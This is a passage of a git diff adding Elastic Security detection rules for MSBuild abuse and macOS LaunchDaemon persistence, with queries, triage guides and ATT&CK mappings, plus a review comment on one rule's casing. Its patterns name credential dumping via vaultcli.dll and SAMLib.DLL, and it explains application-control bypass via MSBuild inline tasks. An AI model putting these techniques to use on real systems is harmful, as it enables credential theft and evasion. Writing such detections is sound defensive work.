@timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", 
+ "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + }, + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_112.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_112.json new file mode 100644 index 00000000000..64d5d2099d7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_112.json 
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, was started after being renamed. This is uncommon behavior and may indicate an attempt to run unnoticed or undetected.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Build Engine Using an Alternate Name", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name == \"MSBuild.exe\" and\n not process.name : \"MSBuild.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", 
+ "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + }, + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_109.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_109.json new file mode 100644 index 00000000000..6f71e1d16a7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_109.json 
@@ -0,0 +1,154 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, loaded DLLs (dynamically linked libraries) responsible for Windows credential management. This technique is sometimes used for credential dumping.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Credential Access via Trusted Developer Utility", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and (process.name : \"MSBuild.exe\" or process.pe.original_file_name == \"MSBuild.exe\")]\n [any where host.os.type == \"windows\" and (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (?dll.name : (\"vaultcli.dll\", \"SAMLib.DLL\") or file.name : (\"vaultcli.dll\", \"SAMLib.DLL\"))]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + 
"threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + } + ] + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.004", + "name": "Windows Credential Manager", + "reference": "https://attack.mitre.org/techniques/T1555/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 109 + }, + "id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_210.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_210.json new file mode 100644 index 00000000000..952442a24a6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_210.json 
@@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, started a PowerShell script or the Visual C# Command Line Compiler. This technique is sometimes used to deploy a malicious payload using the Build Engine.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual. If a build system triggers this rule it can be exempted by process, user or host name." + ], + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "logs-system.security*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft Build Engine Started an Unusual Process", + "new_terms_fields": [ + "host.id", + "user.name" + ], + "query": "host.os.type:windows and event.category:process and event.type:start and process.parent.name:(\"MSBuild.exe\" or \"msbuild.exe\") and\nprocess.name:(\"csc.exe\" or \"iexplore.exe\" or \"powershell.exe\")\n", + "references": [ + "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default 
fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/", + "subtechnique": [ + { + "id": "T1027.004", + "name": "Compile After Delivery", + "reference": "https://attack.mitre.org/techniques/T1027/004/" + } + ] + }, + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 210 + }, + "id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_210", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_211.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_211.json new file mode 100644 index 00000000000..d97aba7b05c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_211.json 
@@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, started a PowerShell script or the Visual C# Command Line Compiler. This technique is sometimes used to deploy a malicious payload using the Build Engine.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual. If a build system triggers this rule it can be exempted by process, user or host name." + ], + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "logs-system.security*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft Build Engine Started an Unusual Process", + "new_terms_fields": [ + "host.id", + "user.name" + ], + "query": "host.os.type:windows and event.category:process and event.type:start and process.parent.name:(\"MSBuild.exe\" or \"msbuild.exe\") and\nprocess.name:(\"csc.exe\" or \"iexplore.exe\" or \"powershell.exe\")\n", + "references": [ + "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and 
default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/", + "subtechnique": [ + { + "id": "T1027.004", + "name": "Compile After Delivery", + "reference": "https://attack.mitre.org/techniques/T1027/004/" + } + ] + }, + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 211 + }, + "id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_211", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_106.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_106.json new file mode 100644 index 00000000000..b536aa83afa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_106.json 
@@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, created a thread in another process. This technique is sometimes used to evade detection or elevate privileges.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual." + ], + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Process Injection by the Microsoft Build Engine", + "query": "process.name:MSBuild.exe and host.os.type:windows and event.action:\"CreateRemoteThread detected (rule: CreateRemoteThread)\"\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + }, + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege 
Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_106.json b/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_106.json new file mode 100644 index 00000000000..f7c2115d571 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_106.json 
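Review bot: The `query` in `9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_106.json` matches `process.name:MSBuild.exe` in a single casing, while the sibling rule `9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6` added in this commit matches `("MSBuild.exe" or "msbuild.exe")`; a KQL match on a keyword field is case-sensitive unless the mapping adds a normalizer, so events that record the image name in lower case would not be evaluated by this rule. Aligning it to `process.name:(\"MSBuild.exe\" or \"msbuild.exe\") and host.os.type:windows and event.action:...` keeps the two rules consistent. The file also has no `setup` block, unlike the other new rules here; a short paragraph stating that the Sysmon CreateRemoteThread event (Event ID 8) must be collected into `logs-windows.sysmon_operational-*` for the `event.action` condition to match would help operators validate their data source.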
@@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Indicates the creation or modification of a launch daemon, which adversaries may use to repeatedly execute malicious payloads as part of persistence.", + "false_positives": [ + "Trusted applications persisting via LaunchDaemons" + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "LaunchDaemon Creation or Modification and Immediate Loading", + "query": "sequence by host.id with maxspan=1m\n [file where host.os.type == \"macos\" and event.type != \"deletion\" and file.path : (\"/System/Library/LaunchDaemons/*\", \"/Library/LaunchDaemons/*\")]\n [process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.name == \"launchctl\" and process.args == \"load\"]\n", + "references": [ + "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9d19ece6-c20e-481a-90c5-ccca596537de", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": 